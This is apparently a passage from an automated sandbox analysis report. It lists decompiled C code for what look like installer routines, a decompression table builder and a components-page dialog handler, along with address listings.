                                                                                                                                    				signed char _t222;
                                                                                                                                    				signed int _t224;
                                                                                                                                    				signed int _t225;
                                                                                                                                    				signed int* _t232;
                                                                                                                                    				signed int _t233;
                                                                                                                                    				signed int _t234;
                                                                                                                                    				void* _t235;
                                                                                                                                    				signed int _t236;
                                                                                                                                    				signed int _t244;
                                                                                                                                    				signed int _t246;
                                                                                                                                    				signed int _t251;
                                                                                                                                    				signed int _t254;
                                                                                                                                    				signed int _t256;
                                                                                                                                    				signed int _t259;
                                                                                                                                    				signed int _t262;
                                                                                                                                    				void* _t263;
                                                                                                                                    				void* _t264;
                                                                                                                                    				signed int _t267;
                                                                                                                                    				intOrPtr _t269;
                                                                                                                                    				intOrPtr _t271;
                                                                                                                                    				signed int _t274;
                                                                                                                                    				intOrPtr* _t275;
                                                                                                                                    				unsigned int _t276;
                                                                                                                                    				void* _t277;
                                                                                                                                    				signed int _t278;
                                                                                                                                    				intOrPtr* _t279;
                                                                                                                                    				signed int _t281;
                                                                                                                                    				intOrPtr _t282;
                                                                                                                                    				intOrPtr _t283;
                                                                                                                                    				signed int* _t284;
                                                                                                                                    				signed int _t286;
                                                                                                                                    				signed int _t287;
                                                                                                                                    				signed int _t288;
                                                                                                                                    				signed int _t296;
                                                                                                                                    				signed int* _t297;
                                                                                                                                    				intOrPtr _t298;
                                                                                                                                    				void* _t299;
                                                                                                                                    
                                                                                                                                    				_t278 = _a8;
                                                                                                                                    				_t187 = 0x10;
                                                                                                                                    				memset( &_v116, 0, _t187 << 2);
                                                                                                                                    				_t189 = _a4;
                                                                                                                                    				_t233 = _t278;
                                                                                                                                    				do {
                                                                                                                                    					_t166 =  *_t189;
                                                                                                                                    					_t189 =  &(_t189[1]);
                                                                                                                                    					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                                                    					_t233 = _t233 - 1;
                                                                                                                                    				} while (_t233 != 0);
                                                                                                                                    				if(_v116 != _t278) {
                                                                                                                                    					_t279 = _a28;
                                                                                                                                    					_t267 =  *_t279;
                                                                                                                                    					_t190 = 1;
                                                                                                                                    					_a28 = _t267;
                                                                                                                                    					_t234 = 0xf;
                                                                                                                                    					while(1) {
                                                                                                                                    						_t168 = 0;
                                                                                                                                    						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						_t190 = _t190 + 1;
                                                                                                                                    						if(_t190 <= _t234) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_v8 = _t190;
                                                                                                                                    					if(_t267 < _t190) {
                                                                                                                                    						_a28 = _t190;
                                                                                                                                    					}
                                                                                                                                    					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                                                    						_t234 = _t234 - 1;
                                                                                                                                    						if(_t234 != 0) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_v28 = _t234;
                                                                                                                                    					if(_a28 > _t234) {
                                                                                                                                    						_a28 = _t234;
                                                                                                                                    					}
                                                                                                                                    					 *_t279 = _a28;
                                                                                                                                    					_t181 = 1 << _t190;
                                                                                                                                    					while(_t190 < _t234) {
                                                                                                                                    						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                                                    						if(_t182 < 0) {
                                                                                                                                    							L64:
                                                                                                                                    							return _t168 | 0xffffffff;
                                                                                                                                    						}
                                                                                                                                    						_t190 = _t190 + 1;
                                                                                                                                    						_t181 = _t182 + _t182;
                                                                                                                                    					}
                                                                                                                                    					_t281 = _t234 << 2;
                                                                                                                                    					_t191 = _t299 + _t281 - 0x70;
                                                                                                                                    					_t269 =  *_t191;
                                                                                                                                    					_t183 = _t181 - _t269;
                                                                                                                                    					_v52 = _t183;
                                                                                                                                    					if(_t183 < 0) {
                                                                                                                                    						goto L64;
                                                                                                                                    					}
                                                                                                                                    					_v176 = _t168;
                                                                                                                                    					 *_t191 = _t269 + _t183;
                                                                                                                                    					_t192 = 0;
                                                                                                                                    					_t235 = _t234 - 1;
                                                                                                                                    					if(_t235 == 0) {
                                                                                                                                    						L21:
                                                                                                                                    						_t184 = _a4;
                                                                                                                                    						_t271 = 0;
                                                                                                                                    						do {
                                                                                                                                    							_t193 =  *_t184;
                                                                                                                                    							_t184 =  &(_t184[1]);
                                                                                                                                    							if(_t193 != _t168) {
                                                                                                                                    								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                                                    								_t236 =  *_t232;
                                                                                                                                    								 *((intOrPtr*)(0x42d6b0 + _t236 * 4)) = _t271;
                                                                                                                                    								 *_t232 = _t236 + 1;
                                                                                                                                    							}
                                                                                                                                    							_t271 = _t271 + 1;
                                                                                                                                    						} while (_t271 < _a8);
                                                                                                                                    						_v16 = _v16 | 0xffffffff;
                                                                                                                                    						_v40 = _v40 & 0x00000000;
                                                                                                                                    						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                                                    						_t195 = _v8;
                                                                                                                                    						_t186 =  ~_a28;
                                                                                                                                    						_v12 = _t168;
                                                                                                                                    						_v180 = _t168;
                                                                                                                                    						_v36 = 0x42d6b0;
                                                                                                                                    						_v240 = _t168;
                                                                                                                                    						if(_t195 > _v28) {
                                                                                                                                    							L62:
                                                                                                                                    							_t168 = 0;
                                                                                                                                    							if(_v52 == 0 || _v28 == 1) {
                                                                                                                                    								return _t168;
                                                                                                                                    							} else {
                                                                                                                                    								goto L64;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_v44 = _t195 - 1;
                                                                                                                                    						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                                                    						do {
                                                                                                                                    							_t282 =  *_v32;
                                                                                                                                    							if(_t282 == 0) {
                                                                                                                                    								goto L61;
                                                                                                                                    							}
                                                                                                                                    							while(1) {
                                                                                                                                    								_t283 = _t282 - 1;
                                                                                                                                    								_t200 = _a28 + _t186;
                                                                                                                                    								_v48 = _t283;
                                                                                                                                    								_v24 = _t200;
                                                                                                                                    								if(_v8 <= _t200) {
                                                                                                                                    									goto L45;
                                                                                                                                    								}
                                                                                                                                    								L31:
                                                                                                                                    								_v20 = _t283 + 1;
                                                                                                                                    								do {
                                                                                                                                    									_v16 = _v16 + 1;
                                                                                                                                    									_t296 = _v28 - _v24;
                                                                                                                                    									if(_t296 > _a28) {
                                                                                                                                    										_t296 = _a28;
                                                                                                                                    									}
                                                                                                                                    									_t222 = _v8 - _v24;
                                                                                                                                    									_t254 = 1 << _t222;
                                                                                                                                    									if(1 <= _v20) {
                                                                                                                                    										L40:
                                                                                                                                    										_t256 =  *_a36;
                                                                                                                                    										_t168 = 1 << _t222;
                                                                                                                                    										_v40 = 1;
                                                                                                                                    										_t274 = _t256 + 1;
                                                                                                                                    										if(_t274 > 0x5a0) {
                                                                                                                                    											goto L64;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										_t275 = _v32;
                                                                                                                                    										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                                                    										if(_t222 >= _t296) {
                                                                                                                                    											goto L40;
                                                                                                                                    										}
                                                                                                                                    										while(1) {
                                                                                                                                    											_t222 = _t222 + 1;
                                                                                                                                    											if(_t222 >= _t296) {
                                                                                                                                    												goto L40;
                                                                                                                                    											}
                                                                                                                                    											_t275 = _t275 + 4;
                                                                                                                                    											_t264 = _t263 + _t263;
                                                                                                                                    											_t175 =  *_t275;
                                                                                                                                    											if(_t264 <= _t175) {
                                                                                                                                    												goto L40;
                                                                                                                                    											}
                                                                                                                                    											_t263 = _t264 - _t175;
                                                                                                                                    										}
                                                                                                                                    										goto L40;
                                                                                                                                    									}
                                                                                                                                    									_t168 = _a32 + _t256 * 4;
                                                                                                                                    									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                                                    									 *_a36 = _t274;
                                                                                                                                    									_t259 = _v16;
                                                                                                                                    									 *_t297 = _t168;
                                                                                                                                    									if(_t259 == 0) {
                                                                                                                                    										 *_a24 = _t168;
                                                                                                                                    									} else {
                                                                                                                                    										_t276 = _v12;
                                                                                                                                    										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                                                    										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                                                    										_a5 = _a28;
                                                                                                                                    										_a4 = _t222;
                                                                                                                                    										_t262 = _t276 >> _t186;
                                                                                                                                    										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                                                    										 *(_t298 + _t262 * 4) = _a4;
                                                                                                                                    									}
                                                                                                                                    									_t224 = _v24;
                                                                                                                                    									_t186 = _t224;
                                                                                                                                    									_t225 = _t224 + _a28;
                                                                                                                                    									_v24 = _t225;
                                                                                                                                    								} while (_v8 > _t225);
                                                                                                                                    								L45:
                                                                                                                                    								_t284 = _v36;
                                                                                                                                    								_a5 = _v8 - _t186;
                                                                                                                                    								if(_t284 < 0x42d6b0 + _a8 * 4) {
                                                                                                                                    									_t205 =  *_t284;
                                                                                                                                    									if(_t205 >= _a12) {
                                                                                                                                    										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                                                    										_v36 =  &(_v36[1]);
                                                                                                                                    										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                                                    										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                                                    									} else {
                                                                                                                                    										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                                                    										_t208 =  *_t284;
                                                                                                                                    										_v36 =  &(_t284[1]);
                                                                                                                                    									}
                                                                                                                                    									_a6 = _t208;
                                                                                                                                    								} else {
                                                                                                                                    									_a4 = 0xc0;
                                                                                                                                    								}
                                                                                                                                    								_t286 = 1 << _v8 - _t186;
                                                                                                                                    								_t244 = _v12 >> _t186;
                                                                                                                                    								while(_t244 < _v40) {
                                                                                                                                    									 *(_t168 + _t244 * 4) = _a4;
                                                                                                                                    									_t244 = _t244 + _t286;
                                                                                                                                    								}
                                                                                                                                    								_t287 = _v12;
                                                                                                                                    								_t246 = 1 << _v44;
                                                                                                                                    								while((_t287 & _t246) != 0) {
                                                                                                                                    									_t287 = _t287 ^ _t246;
                                                                                                                                    									_t246 = _t246 >> 1;
                                                                                                                                    								}
                                                                                                                                    								_t288 = _t287 ^ _t246;
                                                                                                                                    								_v20 = 1;
                                                                                                                                    								_v12 = _t288;
                                                                                                                                    								_t251 = _v16;
                                                                                                                                    								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                                                    									L60:
                                                                                                                                    									if(_v48 != 0) {
                                                                                                                                    										_t282 = _v48;
                                                                                                                                    										_t283 = _t282 - 1;
                                                                                                                                    										_t200 = _a28 + _t186;
                                                                                                                                    										_v48 = _t283;
                                                                                                                                    										_v24 = _t200;
                                                                                                                                    										if(_v8 <= _t200) {
                                                                                                                                    											goto L45;
                                                                                                                                    										}
                                                                                                                                    										goto L31;
                                                                                                                                    									}
                                                                                                                                    									break;
                                                                                                                                    								} else {
                                                                                                                                    									goto L58;
                                                                                                                                    								}
                                                                                                                                    								do {
                                                                                                                                    									L58:
                                                                                                                                    									_t186 = _t186 - _a28;
                                                                                                                                    									_t251 = _t251 - 1;
                                                                                                                                    								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                                                    								_v16 = _t251;
                                                                                                                                    								goto L60;
                                                                                                                                    							}
                                                                                                                                    							L61:
                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                    							_v32 = _v32 + 4;
                                                                                                                                    							_v44 = _v44 + 1;
                                                                                                                                    						} while (_v8 <= _v28);
                                                                                                                                    						goto L62;
                                                                                                                                    					}
                                                                                                                                    					_t277 = 0;
                                                                                                                                    					do {
                                                                                                                                    						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                                                    						_t277 = _t277 + 4;
                                                                                                                                    						_t235 = _t235 - 1;
                                                                                                                                    						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                                                    					} while (_t235 != 0);
                                                                                                                                    					goto L21;
                                                                                                                                    				}
                                                                                                                                    				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                    				 *_a28 =  *_a28 & 0x00000000;
                                                                                                                                    				return 0;
                                                                                                                                    			}











































































                                                                                                                                    0x00000000
                                                                                                                                    0x00407179
                                                                                                                                    0x0040717d
                                                                                                                                    0x00407180
                                                                                                                                    0x00407182
                                                                                                                                    0x00407182
                                                                                                                                    0x00407185
                                                                                                                                    0x0040718b
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040718c
                                                                                                                                    0x00407191
                                                                                                                                    0x00407194
                                                                                                                                    0x00407196
                                                                                                                                    0x00407196
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x004071af
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a6
                                                                                                                                    0x0040744b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040744b
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ad
                                                                                                                                    0x004071ad
                                                                                                                                    0x004071b5
                                                                                                                                    0x004071b8
                                                                                                                                    0x004071bc
                                                                                                                                    0x004071be
                                                                                                                                    0x004071c0
                                                                                                                                    0x004071c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d6
                                                                                                                                    0x004071eb
                                                                                                                                    0x004071eb
                                                                                                                                    0x004071ee
                                                                                                                                    0x004071f0
                                                                                                                                    0x004071f0
                                                                                                                                    0x004071f2
                                                                                                                                    0x004071f7
                                                                                                                                    0x004071f9
                                                                                                                                    0x00407200
                                                                                                                                    0x00407202
                                                                                                                                    0x0040720a
                                                                                                                                    0x0040720a
                                                                                                                                    0x0040720c
                                                                                                                                    0x0040720d
                                                                                                                                    0x0040721c
                                                                                                                                    0x00407220
                                                                                                                                    0x00407224
                                                                                                                                    0x00407227
                                                                                                                                    0x0040722a
                                                                                                                                    0x0040722f
                                                                                                                                    0x00407232
                                                                                                                                    0x00407238
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407245
                                                                                                                                    0x0040743e
                                                                                                                                    0x0040743e
                                                                                                                                    0x00407443
                                                                                                                                    0x00407452
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407443
                                                                                                                                    0x00407252
                                                                                                                                    0x00407255
                                                                                                                                    0x00407258
                                                                                                                                    0x0040725b
                                                                                                                                    0x0040725f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726e
                                                                                                                                    0x00407270
                                                                                                                                    0x00407276
                                                                                                                                    0x00407279
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040727f
                                                                                                                                    0x00407280
                                                                                                                                    0x00407283
                                                                                                                                    0x00407286
                                                                                                                                    0x00407289
                                                                                                                                    0x0040728f
                                                                                                                                    0x00407291
                                                                                                                                    0x00407291
                                                                                                                                    0x00407299
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a2
                                                                                                                                    0x004072c7
                                                                                                                                    0x004072cd
                                                                                                                                    0x004072cf
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072a4
                                                                                                                                    0x004072a4
                                                                                                                                    0x004072ad
                                                                                                                                    0x004072b1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072b5
                                                                                                                                    0x004072b8
                                                                                                                                    0x004072ba
                                                                                                                                    0x004072be
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004072c0
                                                                                                                                    0x004072c0
                                                                                                                                    0x00000000
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072ec
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f8
                                                                                                                                    0x004072fd
                                                                                                                                    0x004072ff
                                                                                                                                    0x00407335
                                                                                                                                    0x00407301
                                                                                                                                    0x00407301
                                                                                                                                    0x00407304
                                                                                                                                    0x00407307
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x0040731b
                                                                                                                                    0x00407326
                                                                                                                                    0x0040732d
                                                                                                                                    0x0040732d
                                                                                                                                    0x00407337
                                                                                                                                    0x0040733a
                                                                                                                                    0x0040733c
                                                                                                                                    0x00407342
                                                                                                                                    0x00407342
                                                                                                                                    0x0040734b
                                                                                                                                    0x0040734e
                                                                                                                                    0x00407353
                                                                                                                                    0x00407362
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736f
                                                                                                                                    0x00407393
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739f
                                                                                                                                    0x004073a5
                                                                                                                                    0x00407371
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407388
                                                                                                                                    0x00407388
                                                                                                                                    0x004073a9
                                                                                                                                    0x00407364
                                                                                                                                    0x00407364
                                                                                                                                    0x00407364
                                                                                                                                    0x004073ba
                                                                                                                                    0x004073be
                                                                                                                                    0x004073ca
                                                                                                                                    0x004073c5
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073d2
                                                                                                                                    0x004073d7
                                                                                                                                    0x004073df
                                                                                                                                    0x004073db
                                                                                                                                    0x004073dd
                                                                                                                                    0x004073dd
                                                                                                                                    0x004073e5
                                                                                                                                    0x004073e7
                                                                                                                                    0x004073ee
                                                                                                                                    0x004073f8
                                                                                                                                    0x00407402
                                                                                                                                    0x0040741e
                                                                                                                                    0x00407422
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726e
                                                                                                                                    0x00407270
                                                                                                                                    0x00407276
                                                                                                                                    0x00407279
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00404BF9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                    				struct HWND__* _v12;
                                                                                                                                    				long _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				signed char* _v32;
                                                                                                                                    				int _v36;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				int _v48;
                                                                                                                                    				signed int* _v60;
                                                                                                                                    				signed char* _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				long _v72;
                                                                                                                                    				void* _v76;
                                                                                                                                    				intOrPtr _v80;
                                                                                                                                    				intOrPtr _v84;
                                                                                                                                    				void* _v88;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed int _t203;
                                                                                                                                    				intOrPtr _t206;
                                                                                                                                    				intOrPtr _t208;
                                                                                                                                    				long _t212;
                                                                                                                                    				signed int _t216;
                                                                                                                                    				signed int _t227;
                                                                                                                                    				void* _t230;
                                                                                                                                    				void* _t231;
                                                                                                                                    				int _t237;
                                                                                                                                    				long _t242;
                                                                                                                                    				long _t243;
                                                                                                                                    				signed int _t244;
                                                                                                                                    				signed int _t250;
                                                                                                                                    				signed int _t252;
                                                                                                                                    				signed char _t253;
                                                                                                                                    				signed char _t259;
                                                                                                                                    				void* _t264;
                                                                                                                                    				void* _t266;
                                                                                                                                    				signed char* _t284;
                                                                                                                                    				signed char _t285;
                                                                                                                                    				long _t290;
                                                                                                                                    				signed int _t300;
                                                                                                                                    				signed int _t308;
                                                                                                                                    				signed char* _t316;
                                                                                                                                    				int _t320;
                                                                                                                                    				int _t321;
                                                                                                                                    				signed int* _t322;
                                                                                                                                    				int _t323;
                                                                                                                                    				long _t324;
                                                                                                                                    				signed int _t325;
                                                                                                                                    				long _t327;
                                                                                                                                    				int _t328;
                                                                                                                                    				signed int _t329;
                                                                                                                                    				void* _t331;
                                                                                                                                    
                                                                                                                                    				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                                    				_v8 = GetDlgItem(_a4, 0x408);
                                                                                                                                    				_t331 = SendMessageA;
                                                                                                                                    				_v24 =  *0x42f468;
                                                                                                                                    				_v28 =  *0x42f434 + 0x94;
                                                                                                                                    				_t320 = 0x10;
                                                                                                                                    				if(_a8 != 0x110) {
                                                                                                                                    					L23:
                                                                                                                                    					if(_a8 != 0x405) {
                                                                                                                                    						_t298 = _a16;
                                                                                                                                    					} else {
                                                                                                                                    						_a12 = 0;
                                                                                                                                    						_t298 = 1;
                                                                                                                                    						_a8 = 0x40f;
                                                                                                                                    						_a16 = 1;
                                                                                                                                    					}
                                                                                                                                    					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                                    						_v16 = _t298;
                                                                                                                                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                                                                    							if(( *0x42f43d & 0x00000002) != 0) {
                                                                                                                                    								L41:
                                                                                                                                    								if(_v16 != 0) {
                                                                                                                                    									_t242 = _v16;
                                                                                                                                    									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                                                                    										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                                                                    									}
                                                                                                                                    									_t243 = _v16;
                                                                                                                                    									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                                                                    										_t298 = _v24;
                                                                                                                                    										_t244 =  *(_t243 + 0x5c);
                                                                                                                                    										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                                                                    											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                                                                    										} else {
                                                                                                                                    											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L48;
                                                                                                                                    							}
                                                                                                                                    							if(_a8 == 0x413) {
                                                                                                                                    								L33:
                                                                                                                                    								_t298 = 0 | _a8 != 0x00000413;
                                                                                                                                    								_t250 = E00404B47(_v8, _a8 != 0x413);
                                                                                                                                    								_t325 = _t250;
                                                                                                                                    								if(_t325 >= 0) {
                                                                                                                                    									_t99 = _v24 + 8; // 0x8
                                                                                                                                    									_t298 = _t250 * 0x418 + _t99;
                                                                                                                                    									_t252 =  *_t298;
                                                                                                                                    									if((_t252 & 0x00000010) == 0) {
                                                                                                                                    										if((_t252 & 0x00000040) == 0) {
                                                                                                                                    											_t253 = _t252 ^ 0x00000001;
                                                                                                                                    										} else {
                                                                                                                                    											_t259 = _t252 ^ 0x00000080;
                                                                                                                                    											if(_t259 >= 0) {
                                                                                                                                    												_t253 = _t259 & 0x000000fe;
                                                                                                                                    											} else {
                                                                                                                                    												_t253 = _t259 | 0x00000001;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										 *_t298 = _t253;
                                                                                                                                    										E0040117D(_t325);
                                                                                                                                    										_a12 = _t325 + 1;
                                                                                                                                    										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                                                                                                                                    										_a8 = 0x40f;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L41;
                                                                                                                                    							}
                                                                                                                                    							_t298 = _a16;
                                                                                                                                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                                    								goto L41;
                                                                                                                                    							}
                                                                                                                                    							goto L33;
                                                                                                                                    						} else {
                                                                                                                                    							goto L48;
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						L48:
                                                                                                                                    						if(_a8 != 0x111) {
                                                                                                                                    							L56:
                                                                                                                                    							if(_a8 == 0x200) {
                                                                                                                                    								SendMessageA(_v8, 0x200, 0, 0);
                                                                                                                                    							}
                                                                                                                                    							if(_a8 == 0x40b) {
                                                                                                                                    								_t230 =  *0x42a87c;
                                                                                                                                    								if(_t230 != 0) {
                                                                                                                                    									ImageList_Destroy(_t230);
                                                                                                                                    								}
                                                                                                                                    								_t231 =  *0x42a890;
                                                                                                                                    								if(_t231 != 0) {
                                                                                                                                    									GlobalFree(_t231);
                                                                                                                                    								}
                                                                                                                                    								 *0x42a87c = 0;
                                                                                                                                    								 *0x42a890 = 0;
                                                                                                                                    								 *0x42f4a0 = 0;
                                                                                                                                    							}
                                                                                                                                    							if(_a8 != 0x40f) {
                                                                                                                                    								L88:
                                                                                                                                    								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                                                                                                                                    									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                                    									ShowWindow(_v8, _t321);
                                                                                                                                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                                                                                    								}
                                                                                                                                    								goto L91;
                                                                                                                                    							} else {
                                                                                                                                    								E004011EF(_t298, 0, 0);
                                                                                                                                    								_t203 = _a12;
                                                                                                                                    								if(_t203 != 0) {
                                                                                                                                    									if(_t203 != 0xffffffff) {
                                                                                                                                    										_t203 = _t203 - 1;
                                                                                                                                    									}
                                                                                                                                    									_push(_t203);
                                                                                                                                    									_push(8);
                                                                                                                                    									E00404BC7();
                                                                                                                                    								}
                                                                                                                                    								if(_a16 == 0) {
                                                                                                                                    									L75:
                                                                                                                                    									E004011EF(_t298, 0, 0);
                                                                                                                                    									_v36 =  *0x42a890;
                                                                                                                                    									_t206 =  *0x42f468;
                                                                                                                                    									_v64 = 0xf030;
                                                                                                                                    									_v24 = 0;
                                                                                                                                    									if( *0x42f46c <= 0) {
                                                                                                                                    										L86:
                                                                                                                                    										InvalidateRect(_v8, 0, 1);
                                                                                                                                    										_t208 =  *0x42ebfc; // 0x671d5f
                                                                                                                                    										if( *((intOrPtr*)(_t208 + 0x10)) != 0) {
                                                                                                                                    											E00404B02(0x3ff, 0xfffffffb, E00404B1A(5));
                                                                                                                                    										}
                                                                                                                                    										goto L88;
                                                                                                                                    									}
                                                                                                                                    									_t322 = _t206 + 8;
                                                                                                                                    									do {
                                                                                                                                    										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                                    										if(_t212 != 0) {
                                                                                                                                    											_t300 =  *_t322;
                                                                                                                                    											_v72 = _t212;
                                                                                                                                    											_v76 = 8;
                                                                                                                                    											if((_t300 & 0x00000001) != 0) {
                                                                                                                                    												_v76 = 9;
                                                                                                                                    												_v60 =  &(_t322[4]);
                                                                                                                                    												_t322[0] = _t322[0] & 0x000000fe;
                                                                                                                                    											}
                                                                                                                                    											if((_t300 & 0x00000040) == 0) {
                                                                                                                                    												_t216 = (_t300 & 0x00000001) + 1;
                                                                                                                                    												if((_t300 & 0x00000010) != 0) {
                                                                                                                                    													_t216 = _t216 + 3;
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t216 = 3;
                                                                                                                                    											}
                                                                                                                                    											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                                                                    											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                                    											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                                                                    										}
                                                                                                                                    										_v24 = _v24 + 1;
                                                                                                                                    										_t322 =  &(_t322[0x106]);
                                                                                                                                    									} while (_v24 <  *0x42f46c);
                                                                                                                                    									goto L86;
                                                                                                                                    								} else {
                                                                                                                                    									_t323 = E004012E2( *0x42a890);
                                                                                                                                    									E00401299(_t323);
                                                                                                                                    									_t227 = 0;
                                                                                                                                    									_t298 = 0;
                                                                                                                                    									if(_t323 <= 0) {
                                                                                                                                    										L74:
                                                                                                                                    										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                                                                    										_a16 = _t323;
                                                                                                                                    										_a8 = 0x420;
                                                                                                                                    										goto L75;
                                                                                                                                    									} else {
                                                                                                                                    										goto L71;
                                                                                                                                    									}
                                                                                                                                    									do {
                                                                                                                                    										L71:
                                                                                                                                    										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                                                                    											_t298 = _t298 + 1;
                                                                                                                                    										}
                                                                                                                                    										_t227 = _t227 + 1;
                                                                                                                                    									} while (_t227 < _t323);
                                                                                                                                    									goto L74;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                                    							goto L91;
                                                                                                                                    						} else {
                                                                                                                                    							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                                                                                    							if(_t237 == 0xffffffff) {
                                                                                                                                    								goto L91;
